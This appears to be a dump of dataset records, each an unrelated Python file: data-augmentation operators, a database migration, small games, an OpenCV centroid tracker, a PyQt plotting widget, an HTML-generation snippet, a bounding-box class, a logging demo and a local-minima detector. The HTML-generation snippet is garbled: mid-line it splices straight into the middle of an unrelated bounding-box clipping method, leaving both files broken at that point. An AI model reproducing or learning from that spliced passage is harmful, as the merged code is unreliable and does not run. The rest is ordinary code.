return (np.log(self.df[field_i]) - np.log(self.df[field_j])) / self.log_base\n\n def _op_init(self, namefieldparams):\n \"\"\" Initialize operations \"\"\"\n super()._op_init(namefieldparams)\n base = namefieldparams.params.get('base')\n self.log_base = _parse_base(base)\n self._debug(f\"Log base is '{base}', setting log_base={self.log_base}\")\n\n\nclass DfAugmentOpLogPlusOneRatio(DfAugmentOpBinary):\n \"\"\" Augment dataset by applying the log+1 ratio of two fields \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, 'logp1_ratio', outputs, model_type, params=['base', 'min_non_zero'])\n\n def can_apply_first(self, field):\n \"\"\" We apply this operation if all numbers in the first field are non-negative \"\"\"\n return (self.df[field] >= 0).all()\n\n def can_apply_second(self, field):\n \"\"\" We apply this operation if all numbers in the second field are non-negative \"\"\"\n return (self.df[field] >= 0).all()\n\n def op(self, field_i, field_j):\n \"\"\" Calculate the arithmetic operation between the two fields \"\"\"\n n = np.log(self.df[field_i] + 1)\n d = 
np.log(self.df[field_j] + 1)\n return (n - d) / self.log_base\n\n def _op_init(self, namefieldparams):\n \"\"\" Initialize operations \"\"\"\n super()._op_init(namefieldparams)\n base = namefieldparams.params.get('base')\n self.log_base = _parse_base(base)\n self._debug(f\"Log base is '{base}', setting log_base={self.log_base}\")\n\n\nclass DfAugmentOpMult(DfAugmentOpNary):\n \"\"\" Augment dataset by multiplying two or more fields \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, 'mult', outputs, model_type, params=['min_non_zero', 'order'])\n\n def op(self, fields):\n \"\"\" Calculate the arithmetic operation between the two or more fields \"\"\"\n return self.df[fields].prod(axis=1)\n\n\nclass DfAugmentOpSub(DfAugmentOpBinary):\n \"\"\" Augment dataset by substracting two fields \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, 'sub', outputs, model_type, params=['min_non_zero'])\n\n def op(self, field_i, field_j):\n \"\"\" Calculate the arithmetic operation between the two fields \"\"\"\n return self.df[field_i] - self.df[field_j]\n\n\nclass DfAugmentNmf(FieldsParams):\n \"\"\" Augment dataset by adding Non-negative martix factorization \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, CONFIG_DATASET_AUGMENT, 'nmf', df.columns, outputs, params=['min_non_zero', 'num'], madatory_params=['num'])\n self.sk_nmf_by_name = dict()\n\n def calc(self, namefieldparams, x):\n \"\"\"Calculate 'num' NMFs using 'fields' from dataframe\n Returns: A dataframe of NMFs (None on failure)\n \"\"\"\n self._debug(f\"Calculating NMF: Start, name={namefieldparams.name}, num={namefieldparams.number}, fields:{namefieldparams.fields}\")\n nmf = NMF(n_components=namefieldparams.number)\n nmf.fit(x)\n self.sk_nmf_by_name[namefieldparams.name] = nmf\n xnmf = nmf.transform(x)\n self._debug(f\"Calculating NMF: End\")\n cols = self.get_col_names_num(namefieldparams, xnmf)\n return self.array_to_df(xnmf, cols)\n\n\nclass DfAugmentPca(FieldsParams):\n \"\"\" Augment dataset by adding principal components \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, CONFIG_DATASET_AUGMENT, 'pca', df.columns, outputs, params=['num'], madatory_params=['num'])\n self.sk_pca_by_name = dict()\n\n def calc(self, namefieldparams, x):\n \"\"\"Calculate 'num' PCAs using 'fields' from dataframe\n Returns: A dataframe of PCAs (None on failure)\n \"\"\"\n num = namefieldparams.params['num']\n self._debug(f\"Calculating PCA: Start, name={namefieldparams.name}, num={num}, fields:{namefieldparams.fields}\")\n if x.isnull().sum().sum() > 0:\n cols_na = x.isnull().sum(axis=0) > 0\n self._fatal_error(f\"Calculating PCA: There are NA values in the inputs, columns: {list(x.columns[cols_na])}\")\n pca = PCA(n_components=num)\n pca.fit(x)\n self.sk_pca_by_name[namefieldparams.name] = pca\n xpca = pca.transform(x)\n self._debug(f\"Calculating PCA: End\")\n cols = self.get_col_names_num(namefieldparams, xpca)\n return self.array_to_df(xpca, cols)\n","sub_path":"src/logml/datasets/df/df_augment.py","file_name":"df_augment.py","file_ext":"py","file_size_in_byte":27597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"229578111","text":"\"\"\"empty message\n\nRevision ID: 2a0568298c51\nRevises: 4645bbe9dadf\nCreate Date: 2016-07-11 17:35:53.263437\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 
'2a0568298c51'\ndown_revision = '4645bbe9dadf'\n\nfrom alembic import op\nimport sqlalchemy as sa\nimport geoalchemy2\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('work_permits',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('date_created', sa.DateTime(), nullable=True),\n sa.Column('date_modified', sa.DateTime(), nullable=True),\n sa.Column('requestor_user_id', sa.Integer(), nullable=False),\n sa.Column('approver_user_id', sa.Integer(), nullable=False),\n sa.Column('type', sa.String(), nullable=False),\n sa.Column('location', sa.String(), nullable=False),\n sa.Column('coordinates', geoalchemy2.types.Geometry(geometry_type='POINT'), nullable=True),\n sa.Column('start_datetime', sa.DateTime(), nullable=True),\n sa.Column('end_datetime', sa.DateTime(), nullable=True),\n sa.Column('job_description_summary', sa.Text(), nullable=True),\n sa.Column('status', sa.String(), nullable=True),\n sa.ForeignKeyConstraint(['approver_user_id'], ['users.id'], ),\n sa.ForeignKeyConstraint(['requestor_user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('work_permit_hazards',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('date_created', sa.DateTime(), nullable=True),\n sa.Column('date_modified', sa.DateTime(), nullable=True),\n sa.Column('permit_id', sa.Integer(), nullable=False),\n sa.Column('hazard_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['hazard_id'], ['hazards.id'], ),\n sa.ForeignKeyConstraint(['permit_id'], ['work_permits.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('work_permit_steps',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('date_created', sa.DateTime(), nullable=True),\n sa.Column('date_modified', sa.DateTime(), nullable=True),\n sa.Column('permit_id', sa.Integer(), nullable=False),\n sa.Column('content', sa.Text(), nullable=False),\n sa.ForeignKeyConstraint(['permit_id'], ['work_permits.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
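One detail worth checking in the `downgrade()` just below: `work_permit_steps` and `work_permit_hazards` hold foreign keys into `work_permits`, so most databases will refuse to drop the parent table first. The usual pattern drops the child tables before the parent (a sketch keeping the auto-generated table names):

```python
from alembic import op

def downgrade():
    # drop the child tables first: they reference work_permits via FKs
    op.drop_table('work_permit_steps')
    op.drop_table('work_permit_hazards')
    op.drop_table('work_permits')
```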
###\n op.drop_table('work_permits')\n op.drop_table('work_permit_steps')\n op.drop_table('work_permit_hazards')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/2a0568298c51_.py","file_name":"2a0568298c51_.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"359222404","text":"import forca\r\nimport adiviha\r\n\r\ndef escolhe_jogo():\r\n print(\"**\" * 20)\r\n print(\"***********ESCOLHA UM JOGO!!************\")\r\n print(\"**\" * 20)\r\n\r\n print(\"adivinhação (1), Forca(2)\")\r\n jogo = int(input(\"E então qual vai ser\"))\r\n\r\n if jogo == 1:\r\n print(\"jogando Adivinhação\")\r\n adiviha.jogar()\r\n elif jogo == 2:\r\n print(\"jogando Forca\")\r\n forca.jogar()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n escolhe_jogo()","sub_path":"joguinhos/jogos.py","file_name":"jogos.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"104534356","text":"from datetime import timedelta\n\nfrom airflow.utils.decorators import apply_defaults\n\nfrom presidio.operators.fixed_duration_jar_operator import FixedDurationJarOperator\n\n\nclass SmartModelAccumulateOperator(FixedDurationJarOperator):\n \"\"\"\n Runs a accumulate aggregations task (a JAR file) for aggregation events model building, using a bash command.\n The c'tor accepts the task arguments that are constant throughout the\n operator runs (e.g. the fixed duration strategy and the data source).\n Other arguments, such as the start date and the end date, are evaluated before every run.\n \"\"\"\n\n @apply_defaults\n def __init__(self, fixed_duration_strategy, command, smart_events_conf, task_id=None, *args, **kwargs):\n \"\"\"\n C'tor.\n :param fixed_duration_strategy: The duration covered by the feature bucket aggregations (currently only daily)\n :type fixed_duration_strategy: timedelta\n :param smart_events_conf: The smart event conf to do the accumulation on\n :type smart_events_conf: string\n :param task_id: The task ID of this operator - If None, the ID is generated automatically\n :type task_id: string\n \"\"\"\n\n self._smart_events_conf = smart_events_conf\n self.task_id = task_id or '{}_{}'.format(\n self._smart_events_conf,\n self.get_task_name()\n )\n\n java_args = {\n 'smart_record_conf_name': self._smart_events_conf,\n }\n\n super(SmartModelAccumulateOperator, self).__init__(\n task_id=self.task_id,\n fixed_duration_strategy=fixed_duration_strategy,\n command=command,\n java_args=java_args,\n *args,\n **kwargs\n )\n\n def get_task_name(self):\n \"\"\"\n :return: The task name\n \"\"\"\n return 'smart_model_accumulation'\n\n","sub_path":"presidio-core/presidio-workflows/presidio/operators/model/smart_model_accumulate_operator.py","file_name":"smart_model_accumulate_operator.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"16139438","text":"import argparse\nimport time\nimport msgpack\nfrom enum import Enum, auto\n\nimport numpy as np\n\nfrom planning_utils import a_star, heuristic, create_grid , probabilistic_a_star\nfrom udacidrone import Drone\nfrom udacidrone.connection import MavlinkConnection\nfrom udacidrone.messaging import MsgID\nfrom udacidrone.frame_utils import global_to_local\n\nimport math\nfrom bresenham import bresenham\n\nTARGET_ALTITUDE = 5\nSAFETY_DISTANCE = 5\n\nSAMPLE_NUMBER =35\n\ndata = 
np.loadtxt('colliders.csv', delimiter=',', dtype='Float64', skiprows=2) \ngrid, north_offset, east_offset = create_grid(data, TARGET_ALTITUDE, SAFETY_DISTANCE)\n\nprint(\"random x\" , np.random.choice(grid.shape[0],SAMPLE_NUMBER))\nprint(\"random y\" , np.random.choice(grid.shape[1],SAMPLE_NUMBER))\n\n\nprint(\"Generating random points\")\nrandom_points = [ (x,y) for x in np.random.choice(grid.shape[0],SAMPLE_NUMBER) for y in np.random.choice(grid.shape[1],SAMPLE_NUMBER)]\n\nprint(\"random_points = \",random_points)\nprint(\"length of random_points = \",len(random_points))\n\nprint(\"Filtering to free space points\")\nfree_space_random_points = [ p for p in random_points if grid[p[0],p[1]] == 0 ]\nprint(\"free_space_random_points = \" , free_space_random_points)\nprint(\"length of free_space_random_points = \" , len(free_space_random_points)) \n\nprint(\"Generating valid actions map\")\nvalid_actions_map ={}\nfor p in free_space_random_points:\n valid_actions_map[p] = []\n\nfor p in free_space_random_points:\n for q in free_space_random_points:\n if p != q:\n pathClear = True\n cells = list(bresenham(p[0], p[1], q[0], q[1]))\n for cell in cells:\n if grid[ cell[0],cell[1] ] == 1:\n pathClear = False\n break\n if pathClear:\n valid_actions_map[p].append( [ q[0]-p[0] , q[1]-p[1] , np.sqrt( (q[0]-p[0])**2 + (q[1]-p[1])**2 ) ] )\n\n\nprint(free_space_random_points)\nprint(valid_actions_map)\n\n\nimport pickle\n\nf = open(\"free_space_random_points.pkl\",\"wb\")\npickle.dump(free_space_random_points,f)\nf.close()\n\n\nf = open(\"valid_actions_map.pkl\",\"wb\")\npickle.dump(valid_actions_map,f)\nf.close()","sub_path":"probabilistic_roadmap_generator.py","file_name":"probabilistic_roadmap_generator.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"151395878","text":"import time\nimport random\n\nimport pygame\n\nfrom aux import *\nfrom carro import Car\nfrom bloco import Block\nfrom pontuacao import Score\n\n\npygame.init()\n\n###############################################################################\n# Tela Inicial\n###############################################################################\ndef game_start():\n intro = True\n\n while intro:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_RETURN:\n intro = False\n game_loop()\n\n\n gameDisplay.fill(gray)\n largeText = pygame.font.Font('freesansbold.ttf',115)\n \n TextSurf, TextRect = text_objects(\"Press Start\", largeText, white)\n TextRect.center = ((DISPLAY_WIDTH/2),(DISPLAY_HEIGHT/2))\n \n gameDisplay.blit(TextSurf, TextRect)\n\n pygame.display.update()\n clock.tick(15)\n\n\n###############################################################################\n# Loop\n###############################################################################\ndef game_loop():\n\n # cria carro\n car = Car(x = DISPLAY_WIDTH*0.45,\n y = DISPLAY_HEIGHT*0.8, \n width = 100, \n img = carImg)\n\n # cria bloco\n block = Block(x = random.randrange(0, DISPLAY_WIDTH), \n y = -DISPLAY_HEIGHT, \n width = 100, \n height = 100, \n color = random_color(), \n speed = 10) \n \n # cria ponto\n score = Score(score=0)\n\n while True:\n # background\n gameDisplay.fill(gray)\n\n # tratamento dos eventos \n for event in pygame.event.get():\n # quit\n if event.type == pygame.QUIT:\n pygame.quit()\n quit() \n \n # botao foi pressionado\n if event.type == pygame.KEYDOWN:\n # 
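The roadmap builder above rasterizes each candidate edge with `bresenham` and keeps the edge only if every traversed cell is free. The same line-of-sight test, factored into a helper (the grid and point names are illustrative):

```python
import numpy as np
from bresenham import bresenham

def path_clear(grid, p, q):
    """True if every cell on the rasterized segment p -> q is free (0)."""
    return all(grid[c[0], c[1]] == 0 for c in bresenham(p[0], p[1], q[0], q[1]))

grid = np.zeros((5, 5), dtype=int)
grid[2, 2] = 1                             # obstacle on the diagonal
print(path_clear(grid, (0, 0), (4, 4)))    # False: the segment crosses (2, 2)
print(path_clear(grid, (0, 4), (0, 0)))    # True: row 0 is free
```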
esquerda\n if event.key == pygame.K_LEFT:\n car.dx = -10\n # direita\n elif event.key == pygame.K_RIGHT:\n car.dx = 10\n\n # botao foi solto\n if event.type == pygame.KEYUP:\n # esquerda ou direia\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n car.dx = 0\n\n # atualiza bloco\n if block.update():\n block.draw()\n else:\n game_start()\n\n # atualiza carro\n if car.update(block):\n car.draw()\n else:\n game_start()\n\n # atualiza placar\n if score.update(block):\n score.draw()\n else:\n game_start()\n \n # atualiza a tela\n pygame.display.update()\n\n clock.tick(60)\n\n\nif __name__ == \"__main__\":\n game_start()\n\n pygame.quit()\n quit()","sub_path":"2ele031/lab/lab3/src/jogo_final/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"7892106","text":"import cv2\nfrom time import perf_counter as pc\n\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_AUTO_EXPOSURE, 0.25)\ncap.set(cv2.CAP_PROP_AUTO_EXPOSURE, -7)\n\n# MOG - has some noise\nfgbg = cv2.bgsegm.createBackgroundSubtractorMOG()\n\n# GMG - removes noise, slower.\nkernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3,3))\nfgbg_gmg = cv2.bgsegm.createBackgroundSubtractorGMG()\n\nwhile True:\n start = pc()\n _, frame = cap.read()\n\n # fg_mask_mog = fgbg.apply(frame) # 8 ms\n\n fg_mask_gmg = fgbg_gmg.apply(frame) # 35 ms\n fg_mask_gmg = cv2.morphologyEx(fg_mask_gmg, cv2.MORPH_OPEN, kernel)\n\n # convert the grayscale image to binary image\n _, thresh = cv2.threshold(fg_mask_gmg,127,255,0)\n im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n for c in contours:\n # calculate moments for each contour\n M = cv2.moments(c)\n\n # calculate x,y coordinate of center\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n cv2.circle(frame, (cX, cY), 5, (255, 255, 255), -1)\n cv2.putText(frame, \"centroid\", (cX - 25, cY - 25),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)\n\n\n cv2.imshow(\"frame\", frame)\n # cv2.imshow(\"fg_mask_mog\", fg_mask_mog)\n # cv2.imshow(\"fg_mask_gmg\", fg_mask_gmg)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n length = int((pc() - start) * 1000) # sec to millis\n print(f\"{length} ms\")\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"centroid-bee-swarm.py","file_name":"centroid-bee-swarm.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"273213388","text":"# -*- encoding: utf-8 -*-\n\nimport PyQt4.QtCore as QtCore\nfrom PyQt4.Qt import *\n\nfrom src.base.baseplotwidget import BasePlotWidget\nfrom src.base.baselines import Line, FuncLine\nfrom src.base.baseplot import BaseDataPlot\nfrom src.linesinfo import InfoLinesView, InfoMarkersView\n\n\nclass DataPlot(BaseDataPlot):\n\n def __init__(self, parent=None):\n super(DataPlot, self).__init__(parent)\n\n self.lineUData = None # напряжения с последнего измерения\n self.lineAData = None # устредненное напряжение за M измерений\n self.lineRefData = None # эталонный сигнал\n\n\n self.list_functions = []\n\n return\n\n def drawLineOfFunction(self, text_func, points_cnt=1000, color=None, legend=\"\"):\n '''\n Рисует на холсте график функции\n :param text_func:\n :param points_cnt:\n :param color:\n :param legend:\n :return:\n '''\n line = FuncLine(self)\n line.drawInit(text_func, points_cnt=points_cnt, 
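In the centroid loop of the bee-swarm script above, `M["m00"]` is zero for degenerate contours, which raises `ZeroDivisionError` on the division; a guard avoids that. A small self-contained sketch (the `[-2]` index tolerates both the 2- and 3-value `cv2.findContours` return signatures):

```python
import cv2
import numpy as np

mask = np.zeros((10, 10), dtype=np.uint8)
mask[2:5, 2:5] = 255                       # one small blob
contours = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)[-2]
for c in contours:
    M = cv2.moments(c)
    if M["m00"] != 0:                      # degenerate contours have zero area
        cX, cY = int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"])
        print(cX, cY)                      # 3 3 for this blob
```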
color=color, legend=legend)\n line.drawOn()\n self.list_functions.append(line)\n\n def drawRandomLine(self):\n '''\n Рисует случайную линию по формуле.\n :return:\n '''\n random_name = \"Random name %s\" % (len(self.list_functions) + 1)\n line = FuncLine(self)\n line.drawInit(\"math.sin(random.random() ** 2 * math.pi * x) * random.random() * 2.0 \",\n color=self._randomColor(), legend=random_name)\n line.drawOn()\n self.list_functions.append(line)\n\n @QtCore.pyqtSlot()\n def updateData(self):\n '''\n Обновляет все графики исходя из новых вхо��ных данных\n :return:\n '''\n\n def updateLine(line, data_x, data_y, self):\n if line is None:\n line = Line(self)\n line.setDataAndUpdate(data_x, data_y)\n else:\n line.setDataAndUpdate(data_x, data_y)\n return line\n\n if not self.is_pause:\n parent = self.parent()\n\n data1 = parent.getTData()\n data2 = parent.getUData()\n data3 = parent.getAData()\n data4 = parent.getRefData()\n\n # напряжения с последнего измерения\n self.lineUData = updateLine(self.lineUData, data1, data2[1], self)\n\n # устредненное напряжение за M измерений\n self.lineAData = updateLine(self.lineAData, data1, data3[1], self)\n\n # эталонный сигнал\n self.lineRefData = updateLine(self.lineRefData, data1, data4[1], self)\n\n for fu in self.list_functions:\n fu.redraw()\n else:\n pass\n\n @QtCore.pyqtSlot()\n def setPause(self):\n self.is_pause = not self.is_pause\n\n @QtCore.pyqtSlot()\n def zoomOff(self):\n self.clearZoomStack()\n\n @QtCore.pyqtSlot()\n def drawDefaultLines(self):\n # self.drawLineOfFunction(\"x ** 2\")\n self.drawLineOfFunction(\"x\")\n self.drawLineOfFunction(\"-x\")\n self.drawLineOfFunction(\"2 * math.pi * x\")\n self.drawLineOfFunction(\"4 * math.pi * x\")\n\n\nclass PlotWidget(BasePlotWidget):\n '''\n Предполагается, что каждому PlotWidget соответствует только один Plot\n '''\n\n def __init__(self, parent=None):\n self.plot = DataPlot()\n BasePlotWidget.__init__(self, parent, self.plot)\n\n buttonMaxWidth = 200\n quitPB = QPushButton('Close')\n quitPB.setMaximumWidth(buttonMaxWidth)\n zoomPB = QPushButton('Zoom off')\n zoomPB.setMaximumWidth(buttonMaxWidth)\n defaultPB = QPushButton('Default')\n defaultPB.setMaximumWidth(buttonMaxWidth)\n\n pausePB = QPushButton('Pause')\n pausePB.setCheckable(True)\n pausePB.setMaximumWidth(buttonMaxWidth)\n\n\n self.h_layout_left = QVBoxLayout()\n self.v_layout = QHBoxLayout()\n self.v_layout_right = QVBoxLayout()\n\n\n self.h_layout_left.addWidget(zoomPB)\n self.h_layout_left.addWidget(pausePB)\n # self.h_layout.addWidget(defaultPB)\n\n self.h_layout_left.addWidget(QSplitter())\n self.h_layout_left.addWidget(quitPB)\n\n\n self.h_layout_left.setSizeConstraint(QLayout.SetMinimumSize)\n\n\n self.info_lines = InfoLinesView(self.plot)\n\n self.info_markers = InfoMarkersView(self.plot)\n self.v_layout_right.addWidget(self.info_lines)\n self.v_layout_right.addWidget(self.info_markers)\n\n self.v_layout_right.setSizeConstraint(QLayout.SetDefaultConstraint)\n\n\n self.v_layout.addLayout(self.h_layout_left)\n self.v_layout.addWidget(self.plot)\n self.v_layout.addLayout(self.v_layout_right)\n\n\n self.setLayout(self.v_layout)\n\n self.connect(pausePB, QtCore.SIGNAL('clicked()'), self.plot, QtCore.SLOT('setPause()'))\n self.connect(zoomPB, QtCore.SIGNAL('clicked()'), self.plot, QtCore.SLOT('zoomOff()'))\n self.connect(quitPB, QtCore.SIGNAL('clicked()'), qApp, QtCore.SLOT('quit()'))\n self.connect(defaultPB, QtCore.SIGNAL('clicked()'), self.plot, 
QtCore.SLOT('drawDefaultLines()'))\n\n\n\n\n\n","sub_path":"src/plotwidget.py","file_name":"plotwidget.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"374806405","text":"from pyh import *\ndef tablecss(self,table = None,width='90%'):\n\ttable.attributes['cellSpacing'] = 1;\n\ttable.attributes['cellPadding'] = 1;\n\ttable.attributes['border'] = 1;\n\ttable.attributes['borderColor'] = '#666666';\n\ttable.attributes['width'] = width;\n #set colum title bgcolor \ndef tr_title_css(self,tr = None):\n\ttr.attributes['bgcolor'] = '#CCCC00';\n\n#get summary info\ndef gentask_html():\n\t\n\tpage = PyH(\"MyPage\")\n\t#page.addCSS('myStylesheet1.css', 'myStylesheet2.css')\n\t#page.addJS('myJavascript1.js', 'myJavascript2.js')\n\n\t#
<h1>MyTitle1</h1>\n\tpage << h1('MyTitle1')\n\n\t#<div align='center' id='myDiv1'><p id='myp1'>my paragraph1</p></div>\n\tpage << div(align='center',id='myDiv1') << p('my paragraph1',id='myp1')\n\n\t#<div id='myDiv2'>\n\t#<h2>title2 in div2</h2>\n\t#<p>paragraph under title2</p>\n\t#</div>\n\tmydiv2 = page << div(id='myDiv2')\n\tmydiv2 << h2('title2 in div2')\n\tmydiv2 << p('paragraph under title2')\n\n\t#<div id='myDiv3' align='right'>\n\t#<p>paragraph in mydiv3</p>\n\t#</div>\n\tmydiv3 = page << div(id='myDiv3')\n\tmydiv3.attributes['align'] = 'right'\n\tmydiv3 << p('paragraph in mydiv3')\n\n\t#<table border='1' id='mytable1'>\n\t#<tr id='headline'><td>Head1</td><td>Head2</td></tr>\n\t#<tr id='line1'><td>r1,c1</td><td>r1,c2</td></tr>\n\t#<tr id='line2'><td>r2,c1</td><td>r2,c2</td></tr>\n\t#</table>
\n\ttable1 = page << table(border='1',id='mytable1')\n\theadtr = table1 << tr(id='headline')\n\theadtr << td('Head1') << td('Head2')\n\n\ttr1 = table1 << tr(id='line1')\n\ttr1 << td('r1,c1') < box[:, 1]) & (box[:, 2] > box[:, 0])\n return self[keep]\n elif self.mode == \"xy854\":\n self.bbox[:, 0].clamp_(min=0, max=self.size[0] - TO_REMOVE)\n self.bbox[:, 1].clamp_(min=0, max=self.size[1] - TO_REMOVE)\n self.bbox[:, 2].clamp_(min=0, max=self.size[0] - TO_REMOVE)\n self.bbox[:, 3].clamp_(min=0, max=self.size[1] - TO_REMOVE)\n self.bbox[:, 4].clamp_(min=0, max=self.size[0] - TO_REMOVE)\n self.bbox[:, 5].clamp_(min=0, max=self.size[1] - TO_REMOVE)\n self.bbox[:, 6].clamp_(min=0, max=self.size[0] - TO_REMOVE)\n self.bbox[:, 7].clamp_(min=0, max=self.size[1] - TO_REMOVE)\n if remove_empty:\n # pass\n # remove the zero area box\n keep = (self.get_field(\"xywht\")[:, 2] > 1) & (self.get_field(\"xywht\")[:, 3] > 1)\n return self[keep]\n return self\n\n def area(self):\n box = self.bbox\n if self.mode == \"xyxy\":\n TO_REMOVE = 1\n area = (box[:, 2] - box[:, 0] + TO_REMOVE) * (box[:, 3] - box[:, 1] + TO_REMOVE)\n elif self.mode == \"xywh\":\n area = box[:, 2] * box[:, 3]\n elif self.mode == \"xy854\":\n box = self.extra_fields[\"xywht\"]\n area = box[:, 2] * box[:, 3]\n else:\n raise RuntimeError(\"Should not be here\")\n\n return area\n\n def copy_with_fields(self, fields, skip_missing=False):\n bbox = BoxList(self.bbox, self.size, self.mode)\n if not isinstance(fields, (list, tuple)):\n fields = [fields]\n for field in fields:\n if self.has_field(field):\n bbox.add_field(field, self.get_field(field))\n elif not skip_missing:\n raise KeyError(\"Field '{}' not found in {}\".format(field, self))\n return bbox\n\n def __repr__(self):\n s = self.__class__.__name__ + \"(\"\n s += \"num_boxes={}, \".format(len(self))\n s += \"image_width={}, \".format(self.size[0])\n s += \"image_height={}, \".format(self.size[1])\n s += \"mode={})\".format(self.mode)\n return s\n\n\nif __name__ == \"__main__\":\n bbox = BoxList([[0, 0, 10, 10], [0, 0, 5, 5]], (10, 10))\n s_bbox = bbox.resize((5, 5))\n print(s_bbox)\n print(s_bbox.bbox)\n\n t_bbox = bbox.transpose(0)\n print(t_bbox)\n print(t_bbox.bbox)\n","sub_path":"dota-benchmark/maskrcnn_benchmark/structures/bounding_box.py","file_name":"bounding_box.py","file_ext":"py","file_size_in_byte":19799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"547197468","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Dec 12 15:29:28 2020\r\n\r\n@author: 13775\r\n\"\"\"\r\n\r\n#日志,写日志的流程基本是固定的。\r\nimport logging\r\nimport sys\r\n\r\n# 1.创建日志的实例\r\nlogger = logging.getLogger(\"testLogger\")\r\n\r\n# 2.定制logger的输出格式\r\nformatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\")\r\n\r\n# 3.创建日志:文件日志,终端日志 \r\nfile_handler = logging.FileHandler(\"testLogger.log\")#文件日志\r\nfile_handler.setFormatter(formatter)\r\nconsole_handler = logging.StreamHandler(sys.stdout)#终端日志\r\nconsole_handler.setFormatter(formatter)\r\n\r\n# 4.设置默认的日志级别\r\nlogger.setLevel(logging.INFO)\r\n\r\n# 5.把文件日志和终端日志添加到文件日志处理器中\r\nlogger.addHandler(file_handler)\r\nlogger.addHandler(console_handler)\r\n\r\n\r\n# 编写日志信息\r\nlogger.critical(\"test critical log!\")\r\nlogger.error(\"test error log!\")\r\nlogger.warning(\"test warning log!\")\r\nlogger.info(\"test info log!\")\r\nlogger.debug(\"test debug log!\")\r\n\r\n# 
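`area()` in the `BoxList` above treats `xyxy` corners as inclusive pixel coordinates, hence the `TO_REMOVE = 1` correction; a one-box check of the arithmetic:

```python
import torch

box = torch.tensor([[0., 0., 9., 9.]])   # xyxy with inclusive pixel corners
TO_REMOVE = 1
area = (box[:, 2] - box[:, 0] + TO_REMOVE) * (box[:, 3] - box[:, 1] + TO_REMOVE)
print(area)                              # tensor([100.]) -- a 10 x 10 pixel patch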
6.当不再使用日志handler时,需要remove\r\nlogger.removeHandler(file_handler)\r\nlogger.removeHandler(console_handler)\r\n","sub_path":"aid1805/spider/day06/testLogging.py","file_name":"testLogging.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"176535900","text":"\nimport numpy as np\nimport scipy.ndimage.filters as filters\nimport scipy.ndimage.morphology as morphology\n\ndef detect_local_minima(arr, mask=None):\n # https://stackoverflow.com/questions/3684484/peak-detection-in-a-2d-array/3689710#3689710\n \"\"\"\n Takes an array and detects the troughs using the local maximum filter.\n Returns a boolean mask of the troughs (i.e. 1 when\n the pixel's value is the neighborhood maximum, 0 otherwise)\n \"\"\"\n # define an connected neighborhood\n # http://www.scipy.org/doc/api_docs/SciPy.ndimage.morphology.html#generate_binary_structure\n neighborhood = morphology.generate_binary_structure(len(arr.shape),2)\n # apply the local minimum filter; all locations of minimum value \n # in their neighborhood are set to 1\n # http://www.scipy.org/doc/api_docs/SciPy.ndimage.filters.html#minimum_filter\n local_max = (filters.maximum_filter(arr, footprint=neighborhood)==arr)\n local_min = (filters.minimum_filter(arr, footprint=neighborhood)==arr)\n # local_min is a mask that contains the peaks we are \n # looking for, but also the background.\n # In order to isolate the peaks we must remove the background from the mask.\n # \n # we create the mask of the background\n background = (arr==0)\n # \n # a little technicality: we must erode the background in order to \n # successfully subtract it from local_min, otherwise a line will \n # appear along the background border (artifact of the local minimum filter)\n # 